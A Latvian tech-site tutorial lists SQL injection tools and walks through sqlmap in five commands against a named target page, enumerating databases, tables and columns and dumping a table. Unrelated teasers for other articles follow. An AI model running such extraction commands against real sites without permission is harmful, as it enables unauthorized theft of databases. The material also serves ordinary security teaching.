Šajā sadaļā Wiki.SpaceDesktop iepazīstinās jūs ar dažiem rīkiem, kas tiek izmantoti SQL injekcijas izmantošanai .
Pašlaik ir daudz drošības ievainojamību skenēšanas rīku (tostarp SQL injekcijas). Šie rīki ļauj diezgan spēcīgi atklāt un izmantot SQL injekcijas ievainojamības. Daži bieži izmantotie automātiskās SQL injekcijas ievainojamības izmantošanas rīki ir:
Ir arī daži citi rīki, uz kuriem varat atsaukties, piemēram: Netsparker, jSQL Injection, Burp, BBQSQL...
Tālāk ir sniegta demonstrācija par Sqlmap izmantošanu pamata SQL injekcijas izmantošanai.
Jūs lejupielādējat Sqlmap vietnē http://sqlmap.org/
Sqlmap ir rakstīts Python, tāpēc, lai izmantotu šo rīku, ir jāinstalē Python. Python varat lejupielādēt vietnē http://www.python.org/downloads/
Vispirms jums ir jānosaka mērķa vietne, šeit man ir šāds mērķis: http://zerocoolhf.altervista.org/level1.php?id=1 (šī lapa tagad ir mirusi).
1. darbība : atveriet cmd un ierakstiet šādu komandu:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap noteiks mērķa ievainojamību un sniegs informāciju par ievainojamību.
2. darbība . Kad esam konstatējuši, ka mērķa vietnei ir SQL injekcijas ievainojamība, mēs turpinām atrast datu bāzes nosaukumu.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Datu bāze: my_zerocoolhf
3. solis : Pēc datu bāzes nosaukuma noteikšanas mēs turpināsim datu bāzē esošo tabulu nosaukumu atrašanu.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Datubāzē ir 2 tabulas: auth un book
4. darbība : nosakiet tabulas kolonnu nosaukumus
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Identificējiet grāmatas tabulas kolonnas: autors, id, cena, nosaukums.
5. darbība : izņemiet datus no tabulas.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Tātad mēs esam ieguvuši mērķa vietnes datu bāzi.
Iepriekš ir sniegta pamata demonstrācija par sqlmap izmantošanu, lai izmantotu SQL injekcijas kļūdas. Vairāk par sqlmap opcijām varat uzzināt vietnē https://github.com/sqlmapproject/sqlmap/wiki/Usage to support exploitation. SQL injekcijas izmantošana.
Ja operētājsistēmas Windows darbības laikā rodas viena vai divas kļūdas, tas nav nekas nopietns, taču, ja bieži rodas problēmas operētājsistēmā Windows, var būt problēmas ar operētājsistēmu.
RAM kešatmiņa nodrošina ātru piekļuvi bieži izmantotajiem datora datiem un paātrina sistēmas reakciju. Bet kā tas darbojas un kā to noņemt?
Ikreiz, kad jūsu mājas interneta savienojumam rodas problēmas, jūs bieži izmantojat maģisko metodi, atvienojot maršrutētāju, nogaidot dažas minūtes un pēc tam pievienojot to atpakaļ. Viss tiks atrisināts, un tīkls atkal darbosies stabili kā parasti. Tātad, vai esat kādreiz domājuši, kāpēc maršrutētāja regulāra restartēšana šajā gadījumā ir tik brīnumaina?
Private Character Editor (PCE) ir neliela Windows programma, kas paslēpta mapē System32. Tas ir gandrīz MS Paint klons, bet tiek izmantots dažādiem radošiem mērķiem. Ja vēlaties izveidot savus fontus vai ikonas, šis ir rīks, kas jums jāizmanto.
Izmantojiet Clonezilla, lai ātri un ļoti vienkārši klonētu visu veco cieto disku uz jaunu cieto disku. Šajā rakstā tiks parādīts, kā klonēt Windows 10 disku, izmantojot Clonezilla un USB zibatmiņas disku.
Šajā rakstā iekļautais Thanos tapešu komplekts būs pieejams visās izšķirtspējās visiem datoriem un klēpjdatoriem
Ļaunprātīgas programmatūras noņemšanas rīki un pretvīrusu programmatūra papildina viens otru un var darboties kopā, lai nodrošinātu maksimālu drošību lietotāju ierīcēs.
FortiClient ir bezmaksas pretvīrusu produkts no Fortinet. Fortinet ir pazīstams ar kiberdrošības aparatūras produktu ražošanu. FortiClient ir vairāku platformu programma, kas pieejama operētājsistēmām Windows, macOS, Linux, Windows Phone, iOS un Android.
Ja izmantojat sistēmu Windows, tiek parādīts kļūdas ziņojums Nevar atvērt šo vienumu. Iespējams, tas ir pārvietots, pārdēvēts vai izdzēsts. Kas man jādara? Lai iegūtu sīkāku informāciju, lūdzu, izpildiet tālāk sniegto rakstu.
Pētnieks Mathy Vanhoef no Lēvenas universitātes ir atklājis nopietnu drošības trūkumu Wi-Fi Protected Access II (WPA2) tīkla drošības protokolā.
